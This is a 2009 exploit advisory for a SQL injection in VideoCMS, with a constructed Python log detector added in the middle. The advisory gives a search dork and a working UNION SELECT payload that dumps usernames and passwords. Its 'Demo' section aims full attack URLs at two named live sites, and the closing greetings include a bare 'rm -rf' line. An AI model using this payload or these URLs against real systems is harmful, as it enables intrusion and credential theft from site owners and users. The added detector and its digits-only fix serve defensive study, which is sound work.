[~] VideoCMS SQL injection vulnerability - (id) #
[~] Author: kaMtiEz (kamzcrew@gmail.com) #
[~] Homepage: http://www.indonesiancoder.com #
[~] Date: December 14, 2009 #
#
######################################## ######################################## ###
[Software Information]
[+] Vendor: http://www.codemight.com/
[+] Download :-
[+] Version: 3.1 or lower maybe also affected
[+] Vulnerability: SQL injection
[+] Dork: "Think iT"
[+] Price: dunno
[+] Location: INDONESIA-JOGJA
[+] Description: http://www.codemight.com/index.php?m=product&p=1
######################################## ######################################## ##
[Here we go .. live from jogja city]
[Vulnerable File]
http://127.0.0.1/[kaMtiEz]/index.php?m=video&v=[VALID-ID][SQL]
[Exploit]
/**/and/**/1=2/**/union/**/all/**/select/**/666,666,@@version,concat_ws(0x3a,username,password),666,666,666/**/from/**/users--
[Demo]
http://mysingaporetube.com/index.php?m=video&v=502/**/and/**/1=2/**/union/**/all/**/select/**/666,666,@@version,concat_ws(0x3a,username,password),666,666,666/**/from/**/users--
http://www.codemight.com/videocms/index.php?m=video&v=23/**/and/**/1=2/**/union/**/all/**/select/**/666,666,@@version,concat_ws(0x3a,username,password),666,666,666/**/from/**/users--
========================================================== ==========================================
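[Added example: log check]
This is an added example, not part of the original advisory and not VideoCMS code: a log check that flags requests to the video module whose v value is not a plain numeric ID, and labels the comment-padded UNION SELECT form shown above. It assumes common access-log request lines and that a legitimate v is a short decimal ID; the log lines, regexes and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines for a lab host; not taken from any real server.
SAMPLE_LOG = [
    '127.0.0.1 - - [14/Dec/2009:10:00:01 +0700] "GET /index.php?m=video&v=502 HTTP/1.1" 200 5120',
    '127.0.0.1 - - [14/Dec/2009:10:00:07 +0700] "GET /index.php?m=video&v=502/**/and/**/1=2/**/union/**/all/**/select/**/666,666 HTTP/1.1" 200 4801',
    '127.0.0.1 - - [14/Dec/2009:10:00:09 +0700] "GET /index.php?m=video&v=23%2F%2A%2A%2FUNION%2F%2A%2A%2FSELECT%2F%2A%2A%2F1 HTTP/1.1" 200 4790',
    '127.0.0.1 - - [14/Dec/2009:10:00:12 +0700] "GET /index.php?m=product&p=1 HTTP/1.1" 200 3001',
    '127.0.0.1 - - [14/Dec/2009:10:00:15 +0700] "GET /index.php?m=video&v=abc HTTP/1.1" 404 120',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
SQL_COMMENT_RE = re.compile(r"/\*.*?\*/", re.S)  # inline /**/ used in place of spaces
UNION_RE = re.compile(r"\bunion\b(?:\s+all)?\s+select\b", re.I)
VALID_ID_RE = re.compile(r"[0-9]{1,10}")  # assumption: IDs are short decimal numbers


def classify_request(path):
    """Return 'ok', 'invalid-id' or 'sqli-union' for one request path."""
    query = parse_qs(urlsplit(path).query, keep_blank_values=True)  # also URL-decodes
    if query.get("m", [""])[0].lower() != "video":
        return "ok"  # the advisory concerns v under m=video only
    verdict = "ok"
    for value in query.get("v", []):
        if VALID_ID_RE.fullmatch(value):
            continue
        # Replace SQL comments with a space so comment-split keywords rejoin.
        flat = " ".join(SQL_COMMENT_RE.sub(" ", value).split())
        if UNION_RE.search(flat):
            return "sqli-union"
        verdict = "invalid-id"
    return verdict


def scan(lines):
    """Return (line_number, verdict) for every request that is not 'ok'."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        if match:
            verdict = classify_request(match.group(1))
            if verdict != "ok":
                hits.append((number, verdict))
    return hits


if __name__ == "__main__":
    for number, verdict in scan(SAMPLE_LOG):
        print(number, verdict)
```

The same digits-only rule, enforced in the application before v reaches the query (integer cast or a bound parameter), closes the injection point the advisory describes.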
[Thx TO]
[+] Indonesian coder team kill-9 crew kirik crew MainHack ServerIsDown SurabayaHackerLink
[+] Tukulesto, M3NW5, arianom, tiw0L, abah_benu, d0ntcry ..
[+] Contrex, onthel, yasea, bugs, Ronz, Pathloader,
[+] Coracore, Gh4mb4s, Jack-, VycOd, m0rgue a. k. a mbamboenk
[NOTE]
[+] My mom and dad... and not forgetting my little sibling ..
[+] A glass of vodka keeps me company every night... :P
[+] Listen to the radio, yeah, http://antisecradio.fm OK, buddy?
[QUOTE]
[+] rm -rf
[EOF]
[+] INDONESIANOCODER TEAM
[+] KILL-9 TEAM